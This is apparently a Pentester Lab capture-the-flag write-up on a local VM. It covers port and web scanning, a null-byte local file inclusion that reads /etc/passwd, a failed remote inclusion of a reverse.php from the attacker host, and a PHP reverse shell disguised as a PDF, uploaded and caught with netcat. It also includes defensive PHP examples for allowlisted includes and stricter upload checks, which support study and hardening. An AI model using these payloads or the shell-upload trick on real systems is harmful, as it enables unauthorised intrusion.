vulnhub Pentester Lab: PHP Include And Post Exploitation Notes
Pentester Lab: PHP Include And Post Exploitation
The image is booted live, so any small disk will do for storage.
Service enumeration
# nmap -p- 10.10.10.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 11:27 EDT
Nmap scan report for 10.10.10.15
Host is up (0.00055s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:DD:06:9A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 164.23 seconds

# nmap -p80 -sV 10.10.10.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 11:30 EDT
Nmap scan report for 10.10.10.15
Host is up (0.00057s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:DD:06:9A (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.78 seconds
This time only [port 80] needs to be considered.
Details
[port 80] http Apache httpd 2.2.16 (Debian)
# nikto -h 10.10.10.15
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.15
+ Target Hostname:    10.10.10.15
+ Target Port:        80
+ Start Time:         2020-05-16 11:27:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 3440, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8673 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2020-05-16 11:28:12 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.15

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat May 16 11:28:34 2020
URL_BASE: http://10.10.10.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.15/ ----
+ http://10.10.10.15/cgi-bin/ (CODE:403|SIZE:287)
==> DIRECTORY: http://10.10.10.15/classes/
==> DIRECTORY: http://10.10.10.15/css/
+ http://10.10.10.15/footer (CODE:200|SIZE:182)
+ http://10.10.10.15/header (CODE:200|SIZE:755)
==> DIRECTORY: http://10.10.10.15/images/
+ http://10.10.10.15/index (CODE:200|SIZE:2020)
+ http://10.10.10.15/index.php (CODE:200|SIZE:2020)
+ http://10.10.10.15/login (CODE:200|SIZE:463)
+ http://10.10.10.15/main (CODE:200|SIZE:938)
+ http://10.10.10.15/server-status (CODE:403|SIZE:292)
+ http://10.10.10.15/show (CODE:200|SIZE:816)
+ http://10.10.10.15/submit (CODE:200|SIZE:832)
==> DIRECTORY: http://10.10.10.15/uploads/

---- Entering directory: http://10.10.10.15/classes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.15/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.15/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.15/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat May 16 11:28:36 2020
DOWNLOADED: 4612 - FOUND: 10
Since the lab is titled php_include_and_post_exploitation, I want to start with the parts that look like that.
Looking around, it turned out that every link from index.php, and everything it displays, is loaded by taking the string passed in index.php's page parameter, appending ".php", and including that file.
Looks like there are various credentials to go after here.
I had heard of the null byte trick, so I tried it.
http://10.10.10.15/index.php?page=../../../etc/passwd%00
Credentials captured.
Apparently there is also a variant where a remote file can be loaded, but
http://10.10.10.15/index.php?page=http://10.10.10.3/reverse.php%00
this time remote file inclusion appears to have been mitigated.
So only local files are left.
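The include pattern just described, and the fix for it, as an added example that is not code from the lab or the original post: the request should select a key from an allowlist, never build a path. The page names come from the dirb listing above; the helper names and the directory constant are my own assumptions, and the dispatch at the bottom assumes those four page files exist next to the script.

```php
<?php
// Added example (not from the original post). Demonstrates why
// include($_GET['page'] . '.php') is exploitable and how to replace it.

// Vulnerable shape (what the lab does): user input becomes a path, and on
// PHP < 5.3.4 a trailing NUL (%00) truncates the string so ".php" is never
// appended. Shown only for contrast; it is never called here.
function include_page_vulnerable(string $page): void
{
    include $page . '.php';   // ../../../etc/passwd%00 -> /etc/passwd
}

// Hardened shape: the request selects a key, never a path. Unknown keys fall
// back to a default instead of reaching the filesystem at all.
const PAGES = [
    'main'   => __DIR__ . '/main.php',
    'show'   => __DIR__ . '/show.php',
    'submit' => __DIR__ . '/submit.php',
    'login'  => __DIR__ . '/login.php',
];

function resolve_page(string $page): string
{
    // Exact-match lookup: "../", "%00", "http://" and "./uploads/x.pdf" all miss.
    return PAGES[$page] ?? PAGES['main'];
}

// Defence in depth for code that cannot move to an allowlist yet: reject NUL
// and path separators outright, then confirm the resolved file stays inside
// the intended directory. Returns null for anything that fails.
function safe_page_path(string $page, string $base): ?string
{
    if ($page === '' || preg_match('/[\x00\/\\\\]/', $page) === 1) {
        return null;
    }
    $real     = realpath($base . '/' . $page . '.php');
    $baseReal = realpath($base);
    if ($real === false || $baseReal === false
        || strpos($real, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$page = $_GET['page'] ?? 'main';
include resolve_page($page);
```

Note that safe_page_path() still only limits which .php files under the base directory can be included; the allowlist is the version to prefer.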
From the submit page it looks like files can be uploaded to /uploads/.
Trying to upload the usual pentestmonkey PHP reverse shell, I am told only PDFs are allowed.
After various attempts: a non-PDF file named *.pdf is rejected, and a PDF with a non-.pdf extension is rejected.
So the server seems to check both the extension and the file type.
So this is the approach.
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.pdf
# sed -i "1i%PDF-1.5\n" reverse.pdf
# cat reverse.pdf | head
%PDF-1.5

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
You might think that cannot possibly be enough, but the check seems to look only at the beginning of the file.
After that, listen with nc or similar and borrow the power of index.php, which will happily include the file via page as PHP.
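An upload handler that does not stop at "extension is .pdf and the first bytes are %PDF", as an added example that is not the lab's or the post's code. It scans the whole file for PHP open tags, names the stored file itself, and keeps uploads outside the web root; the directory, size limit and form field name are my own assumptions.

```php
<?php
// Added example (not from the original post): stricter PDF upload validation.

const UPLOAD_DIR = '/var/uploads';      // assumed path, outside the web root
const MAX_BYTES  = 5 * 1024 * 1024;     // assumed limit

// Returns null when the file is acceptable, otherwise the reason for rejection.
function validate_pdf_upload(string $tmpPath, string $clientName): ?string
{
    if (!is_uploaded_file($tmpPath)) return 'not an uploaded file';
    if (filesize($tmpPath) > MAX_BYTES) return 'too large';
    if (strtolower(pathinfo($clientName, PATHINFO_EXTENSION)) !== 'pdf') {
        return 'extension must be .pdf';
    }
    $data = file_get_contents($tmpPath);
    // Extension plus magic bytes is all the lab verified; a "%PDF-1.5" line
    // prepended to a PHP file satisfies both, and libmagic-based MIME
    // detection keys on the same header, so neither stops the polyglot.
    if (strncmp($data, '%PDF-', 5) !== 0) return 'missing PDF header';
    // Scan the entire body, not just the first line. Only "<?php" and "<?="
    // are rejected: real PDFs may carry XMP metadata, which begins "<?xpacket".
    if (preg_match('/<\?(php\b|=)/i', $data) === 1) return 'embedded PHP tag';
    return null;
}

// Stores under a random server-chosen name; the client name never reaches disk.
function store_upload(string $tmpPath): string
{
    $name = bin2hex(random_bytes(16)) . '.pdf';
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($tmpPath, $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0640);     // data, not code: no execute bit
    return $name;
}

if (isset($_FILES['file'])) {
    $err = validate_pdf_upload($_FILES['file']['tmp_name'], $_FILES['file']['name']);
    if ($err !== null) {
        http_response_code(400);
        exit('Rejected: ' . $err);
    }
    echo 'Stored as ' . store_upload($_FILES['file']['tmp_name']);
}
```

Content scanning is a backstop; what actually turned this upload into code execution is index.php including an arbitrary path, so the include fix matters more than any upload filter.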
http://10.10.10.15/index.php?page=./uploads/reverse.pdf%00
# nc -nlvp 8080
Ncat: Version 7.80 ( https://nmap.org/ncat )
(snip)
Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
 16:39:46 up  5:00,  6 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
user     tty2                       11:39    5:00m  0.00s  0.00s -bash
user     tty3                       11:39    5:00m  0.01s  0.01s -bash
user     tty4                       11:39    5:00m  0.00s  0.00s -bash
user     tty5                       11:39    5:00m  0.00s  0.00s -bash
user     tty6                       11:39    5:00m  0.00s  0.00s -bash
user     tty1                       11:39    5:00m  0.01s  0.00s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
shell getchu!
after shell getchu
It looks like no path to a root shell is provided in this one.
Well, it was meant to teach php_include_and_post_exploitation, after all.
The end
In PHP 5.3.4 and later, the null byte trick can no longer be used to strip the appended extension when including a local file.
So it is said.
References